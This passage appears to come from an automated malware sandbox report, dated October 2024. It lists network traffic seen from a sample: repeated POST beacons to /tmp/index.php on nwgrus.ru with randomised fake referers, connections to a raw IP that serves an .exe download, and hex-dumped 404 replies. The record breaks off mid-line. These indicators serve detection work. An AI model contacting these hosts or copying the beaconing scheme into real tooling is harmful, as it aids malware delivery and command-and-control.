    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fcbqaeiodmerjjce.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uqyhewsqgme.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mcnivsvqoyuiyi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://snlvxdcuggcgtr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rcayuliatuydngjp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gxhoywsjvhdimib.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hnkujwopesopy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gcsggiqiypjqctoh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://swrrssmuceopwlwv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mcrofbggconl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://euadhmjtligscip.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oratgvwctswjsrg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jukynnhymwnwl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pithrelifcqallw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kdahnseejtpvc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://umfnnmmrmjakpw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hjaonoqsbnhieap.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kfntyderqkkh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bpuffphxcjr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://evwfmjkyovghciew.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxitdoiirfghic.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://goilbsuxbgu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bmhunjcauidhfjas.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ehqwwnwmwdh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oawojikvjxqxudp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xlurbvunmfixk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kamxftfsfgaby.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oqmylvnapebvw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hyeljwvkydclsem.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ovnkboilnwpev.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://elavhytildeantb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qvpxnipvuyciicri.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nsxfaafbvsvkfwb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://euvycibbjmraba.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://istrtdmsewdifyn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://chihuprqnvownoad.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://muicqrvubdhbsy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xfevllovssfdblv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
    Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
    Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
    Source: global trafficDNS traffic detected: DNS query: ninjahallnews.com
    Source: unknownHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://vucrathrxdck.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 16:24:20 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 16:24:37 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 16:24:38 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 16:24:47 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 16:26:00 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 16:26:17 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 16:26:37 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 16:26:56 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 ec Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 